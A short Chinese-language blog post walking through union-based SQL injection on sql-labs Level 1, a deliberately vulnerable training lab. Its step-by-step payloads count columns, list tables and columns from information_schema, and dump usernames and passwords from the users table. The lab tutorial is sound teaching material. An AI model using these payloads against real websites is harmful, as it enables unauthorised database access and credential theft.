显错注入

SQL注入漏洞是Web层面最高危的漏洞之一,通过将恶意的SQL查询或添加语句插入到应用的输入参数中,再在后台SQL服务器上解析执行进行的攻击。
一下直接用sql-labs第一关演示
1.题目让我们请求一个id参数,如下
2.我们输入一个单引号,显示报错,如下
 
3.所以练习我们去看一下他的源代码,如下
4.我们发现变量id在获取后直接代入sql语句查询,由此我们可以构造出payload猜字段长,二分法可得:?id=-1' order by 3--+
5.知道字段长后,爆回显点:?id=-1' union select 1,2,3--+ 得到回显点在2,3
6.爆数据库:?id=-1' union select 1,database(),3--+ 得到数据库为security
7.爆出数据表并全部列出:?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()--+ 我们得到该数据库以下表,得到users的用户表
8.然后我们继续爆字段名:?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' --+
9.我们看到了username和password的列,继续爆出:?id=-1' union select 1,2,group_concat(username,0x3a,password) from users --+
10.0x3a主要是为了将username和password分割开 可以不加,主要是为了区分。


posted @ 2020-06-26 15:54  N_schema  阅读(177)  评论(0编辑  收藏  举报